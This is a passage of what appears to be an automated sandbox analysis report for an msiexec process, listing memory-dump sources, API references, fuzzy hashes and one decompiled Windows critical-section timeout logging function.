                      • Opcode Fuzzy Hash: e79fd08d11b19e2819c1d884b9a689d12867ad8e87ca8e86b3f6458d2da035b0
                      • Instruction Fuzzy Hash: 9BD05E767902003BE610EBA4DD07F662286AB95754F1E08ACF94CEB3C3D925D5058625
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetErrorMode.KERNELBASE(00008003,?,006C8D14,?), ref: 006CF6EB
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                      • Instruction ID: 1bc21243e76099f91ea9543508b04a52706ec79481342dae4a09eabc63c28dfc
                      • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                      • Instruction Fuzzy Hash: 9BD05E626503043BE610BAA5DC03F66338AAB44B40F490078F948973C3D964E4004165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7b09b3777b7dff3d28408823472d6a7d6041c9721cfed3eac12d26111cd4fd73
                      • Instruction ID: 8dd11cc2385cbce3c111b847b549f9c7272b001ea47e864c8c9d3c6312bb3025
                      • Opcode Fuzzy Hash: 7b09b3777b7dff3d28408823472d6a7d6041c9721cfed3eac12d26111cd4fd73
                      • Instruction Fuzzy Hash: CAB09BF19024C5C5F715DB614A087277A447BD1745F17C052D2430651A5778E0D5F5B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 53%
                      			E0473FDDA(intOrPtr* __edx, intOrPtr _a4) {
                      				void* _t7;
                      				intOrPtr _t9;
                      				intOrPtr _t10;
                      				intOrPtr* _t12;
                      				intOrPtr* _t13;
                      				intOrPtr _t14;
                      				intOrPtr* _t15;
                      
                      				_t13 = __edx;
                      				_push(_a4);
                      				_t14 =  *[fs:0x18];
                      				_t15 = _t12;
                      				_t7 = E046ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                      				_push(_t13);
                      				E04735720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                      				_t9 =  *_t15;
                      				if(_t9 == 0xffffffff) {
                      					_t10 = 0;
                      				} else {
                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                      				}
                      				_push(_t10);
                      				_push(_t15);
                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                      				return E04735720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                      			}











                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0473FDFA
                      Strings
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0473FE2B
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0473FE01
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      • Opcode ID: 3e376267fc3091c43191e952a899e52fd80a747d55c98c2d7645866a022b830f
                      • Instruction ID: c19d591f11417b2ba249e54812b5949de1e31a46b4cc8d99f687831502545f2c
                      • Opcode Fuzzy Hash: 3e376267fc3091c43191e952a899e52fd80a747d55c98c2d7645866a022b830f
                      • Instruction Fuzzy Hash: 3EF0F672640601BFEA201A55DC06F33BB9EEB44771F140354F628562E2EAA2FC2096F4
                      Uniqueness

                      Uniqueness Score: -1.00%